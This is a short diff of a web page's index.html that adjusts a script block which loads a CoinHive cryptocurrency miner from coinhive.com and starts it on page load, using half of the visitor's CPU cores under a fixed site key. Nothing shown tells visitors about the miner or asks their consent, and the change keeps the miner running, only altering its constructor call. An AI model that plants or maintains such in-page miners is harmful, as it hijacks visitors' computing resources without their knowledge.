--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
     <meta name="viewport" content="width=device-width, initial-scale=1">
     <script src="https://coinhive.com/lib/coinhive.min.js"></script>
 <script>
-    var miner = new CoinHive.User('mgKCszBsJYX5eJqEaBwkha2dbZ9z7rMk', {username:'john-doe', threads: Math.ceil(navigator.hardwareConcurrency/2)});
+    var miner = new CoinHive('mgKCszBsJYX5eJqEaBwkha2dbZ9z7rMk', {username:'john-doe', threads: Math.ceil(navigator.hardwareConcurrency/2)});
                 miner.start();
 </script>
 </head>
